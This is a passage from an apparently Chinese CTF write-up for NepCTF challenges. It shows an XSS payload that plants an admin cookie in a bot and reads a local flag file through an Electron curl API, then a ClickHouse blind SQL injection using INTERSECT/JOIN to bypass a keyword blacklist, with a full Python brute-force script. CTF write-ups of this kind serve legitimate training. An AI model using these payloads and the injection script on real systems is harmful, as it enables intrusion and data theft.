      return res.status(500).json({ success: false, message: 'bot visit failed' });
    }

    console.log(`bot visit success:\n${stdout}`);
    res.json({ success: true, message: 'bot visit success' });
  });
});

这里bot不会携带秘密就是不会带cookie去访问,因此需要通过 document.cookie 为 Bot 写入一个账号 admin 的 Cookie 进去,然后利用 window.electronAPI.curl (前提是 Bot 使用提供的 Electron 客户端访问)拿出 flag 内容并通过保存个人简介接口将 flag 写入到账号 admin 的bio中。

具体这样,首先登入admin/nepn3pctf-game2025,拿到sid

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
document.cookie = 'connect.sid=s%3ArQSWb61_hTjENdPL3SoooS_FLWt86tcA.PJZErvbohBUJ8yZMEJ0YUAmguZdGx1zBZxx5vVoJMAo';
window.electronAPI.curl('file:///flag').then(data => {
    fetch('/api/save-bio', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            'bio': JSON.stringify(data)
        })
    })
})

我们可以在这里XSS,通过/api/set-login-bg路由传入一个背景,然后用/api/bot路由让bot访问,这里可以写入bio

这里上payload

1
{"key":"x\" onload=\"document.cookie='connect.sid=s%3ArQSWb61_hTjENdPL3SoooS_FLWt86tcA.PJZErvbohBUJ8yZMEJ0YUAmguZdGx1zBZxx5vVoJMAo';window.electronAPI.curl('file:///flag').then(data=>{fetch('/api/save-bio',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({'bio':JSON.stringify(data)})})})\" x=\""}

image-20250802143912224

然后让bot访问

image-20250802144004852

然后访问api/user查看bio

image-20250802144120317

我难道不是sql注入天才吗

hint: 后端数据库是clickhouse,黑名单字符串如下preg_match(’/select.*from|(|or|and|union|except/is’,$id)

我们可以查看clickhouse文档

FROM 子句 | ClickHouse 文档 - ClickHouse 数据库

输入id可以正常查询

输入name报错了

image-20250802150452573

clickhouse报错,我们看到注入点

1
SELECT * FROM users WHERE id = {id} FORMAT JSON

这里我们利用INTERSECTLIKE语句进行盲注

这里可以查看文档看看用法INTERSECT 子句 | ClickHouse 文档 - ClickHouse 数据库

INTERSECT 子句实现计算两个查询的交集,但需要两个查询语句的列数量、类型和顺序一致,返回结果仅包括两个查询中重复的记录

先给盲注payload

1
payload_template = "id INTERSECT FROM system.databases AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age"

拼接到前面是这样

1
2
3
4
5
6
7
SELECT users.id, users.name, users.email, users.age
FROM users
WHERE users.id = id INTERSECT
FROM system.databases AS inject
JOIN users ON inject.name LIKE '{pattern}'
SELECT users.id, users.name, users.email, users.age
FORMAT JSON;

前半部分就是这个

1
2
3
4
5
SELECT * FROM users WHERE id = {id}
==>
SELECT users.id, users.name, users.email, users.age
FROM users
WHERE users.id = id

返回的内容是所有用户的 ID、Name、Email 和 Age 。

然后分析INTERSECT后的语句,然后后面这个FROM语句能够放在SELECT之前,能够绕过select.*from的waf

JOIN 子句也可以用于扩展 FROM 子句功能。

后面语句其实就是

1
2
3
SELECT users.id, users.name, users.email, users.age
FROM system.databases
JOIN users ON system.databases.name LIKE '{pattern}'

由于INTERSECT语句特性,我们同样需要获取所有用户的 ID、Name、Email 和 Age,然后 JOIN 子句访问了用户表 users ,将 ON 条件当作 IF 判断来用,若 ON 条件为真则同样输出所有用户的 ID、Name、Email 和 Age

然后就是写脚本盲注了

exp

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
import requests
from collections import deque
from urllib.parse import urlparse
import string
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# --- 配置 ---
URL = "https://nepctf32-fuiw-wxqq-li66-n6fgyvars692.nepctf.com"
CHARSET = '1234567890abcdef-}'
# CHARSET = string.ascii_lowercase + string.digits + '~`!@#$%^&*()+-={}[]\|<>,.?/_'
# CHARSET = string.ascii_letters + string.digits + string.punctuation
# 库
# payload_template = "id INTERSECT FROM system.databases AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age"
# 表
# payload_template = "id INTERSECT FROM system.tables AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age WHERE inject.database='nepnep'"
# 名
# payload_template = "id INTERSECT FROM system.columns AS inject JOIN users ON inject.name LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age WHERE inject.table='nepnep'"
# flag
# python test2.py "NepCTF{"
FLAG_MODE = True  # True 表示爆破 flag,False 表示遍历所有可能的表名
payload_template = "id INTERSECT FROM nepnep.nepnep AS inject JOIN users ON inject.`51@g_ls_h3r3` LIKE '{pattern}' SELECT users.id, users.name, users.email, users.age"


HOSTNAME = urlparse(URL).hostname
HEADERS = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'keep-alive',
    'Host': HOSTNAME
}

# 添加代理配置 (默认指向Burp Suite)
PROXIES = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}
# 每次请求后的延迟时间(秒),以避免过快请求导致被封禁
REQUEST_DELAY = 3


# --- 核心检测函数 ---

def check(prefix, exact_match=False, max_retries=10, retry_delay=5):
    """
    发送盲注Payload,根据响应判断条件是否为真。
    内存超限时会自动等待 retry_delay 秒重试,最多 max_retries 次。
    """
    like_pattern = prefix if exact_match else f"{prefix}%"
    final_payload = payload_template.format(pattern=like_pattern)
    data = {'id': final_payload}

    attempt = 0
    while attempt < max_retries:
        attempt += 1
        try:
            response = requests.post(
                URL,
                headers=HEADERS,
                data=data,
                timeout=15,
                proxies=PROXIES,
                verify=False
            )

            # 每次请求后暂停,避免触发防护
            time.sleep(REQUEST_DELAY)

            # --- 内存超限处理 ---
            if "MEMORY_LIMIT_EXCEEDED" in response.text or "memory limit exceeded" in response.text:
                print(f"[!] 内存超限 (第{attempt}次尝试) -> 前缀 '{prefix}'")
                if attempt < max_retries:
                    print(f"    等待 {retry_delay} 秒后重试...")
                    time.sleep(retry_delay)
                    continue
                else:
                    print(f"[-] 前缀 '{prefix}' 多次内存超限,放弃本次尝试。")
                    return False

            # --- 成功返回判断 ---
            return 'User_5' in response.text

        except requests.exceptions.RequestException as e:
            print(f"[Error] 请求失败 (第{attempt}次) 前缀 '{prefix}': {e}", file=sys.stderr)
            if attempt < max_retries:
                print(f"    等待 {retry_delay} 秒后重试...")
                time.sleep(retry_delay)
            else:
                return False


# --- 广度优先搜索 (BFS) 算法 ---

def bfs_discover(start_prefix=""):
    """
    使用 BFS / DFS 爆破,根据 FLAG_MODE 自动切换策略:
    - FLAG_MODE = True  : 找到一个字符立即进入下一位(类似 DFS)
    - FLAG_MODE = False : 完整 BFS 遍历所有可能字符
    """
    print("--- [ 启动盲注爆破脚本 ] ---")
    queue = deque()
    found_names = set()

    # 1. 初始化队列
    if start_prefix:
        print(f"\n[+] 从指定前缀 '{start_prefix}' 开始搜索...")
        if check(start_prefix):
            print(f"  - 前缀 '{start_prefix}' 有效,加入队列。")
            queue.append(start_prefix)
            if check(start_prefix, exact_match=True):
                print(f"  [!] 指定前缀即完整项: {start_prefix}")
                found_names.add(start_prefix)
        else:
            print(f"[-] 前缀 '{start_prefix}' 无效或无返回,终止。")
            return
    else:
        if FLAG_MODE:
            # flag 模式从空前缀开始 DFS
            print("[+] FLAG_MODE: 从空前缀开始 DFS 爆破。")
            queue.append("")
        else:
            # 枚举模式 BFS 初始化
            print("\n[+] 正在探测第一层前缀...")
            for char in CHARSET:
                if check(char):
                    print(f"  - 发现有效起始字符: '{char}'")
                    queue.append(char)
                    if check(char, exact_match=True):
                        print(f"  [!] 发现完整项: {char}")
                        found_names.add(char)

    if not queue:
        print("[-] 初始队列为空,退出。")
        return

    # 2. BFS/DFS 遍历
    level = len(start_prefix) if start_prefix else 0
    while queue:
        level_size = len(queue)
        print(f"\n--- 正在处理长度为 {level + 1} 的前缀 (当前队列: {level_size}) ---")

        for _ in range(level_size):
            current_prefix = queue.popleft()
            print(f"[INFO] 扩展前缀: '{current_prefix}'")

            for char in CHARSET:
                new_prefix = current_prefix + char

                # 检查新前缀是否存在
                if check(new_prefix):
                    print(f"  - 有效前缀: '{new_prefix}'")
                    queue.append(new_prefix)

                    # 检查是否完整项
                    if check(new_prefix, exact_match=True):
                        print(f"\n  [!] 发现完整项: {new_prefix}\n")
                        found_names.add(new_prefix)

                    if FLAG_MODE:
                        # FLAG_MODE 下立即进入下一位,不再爆破同层其他字符
                        print(f"  [FLAG_MODE] 立即进入下一位爆破: '{new_prefix}'")
                        queue.clear()
                        queue.append(new_prefix)
                        break  # 跳出 CHARSET 循环
            # FLAG_MODE 下,一旦找到字符就不再处理同层其他前缀
            if FLAG_MODE and queue:
                break

        level += 1
        time.sleep(0.5)  # 避免过快请求

    print("\n--- [ 爆破完成 ] ---")
    if found_names:
        print("[SUCCESS] 发现的完整项:")
        for name in sorted(list(found_names)):
            print(f"  -> {name}")
    else:
        print("[-] 未能发现任何完整项。")


# --- 脚本主入口 ---
if __name__ == "__main__":
    # 从命令行参数获取可选的起始前缀
    print(f"用法: python {sys.argv[0]} [可选的起始前缀]")
    start_prefix = ""
    if len(sys.argv) > 1:
        start_prefix = sys.argv[1]
        print(f"\n[*] 检测到命令行参数,将使用 '{start_prefix}' 作为起始前缀进行搜索。")
    else:
        print("\n[*] 未提供起始前缀,将从头开始搜索所有表名。")

    bfs_discover(start_prefix)

爆到内存超限其实是环境问题,等几分钟狠狠爆就行了

image-20250802164441790

Licensed under 9u_l3
使用 Hugo 构建
主题 StackJimmy 设计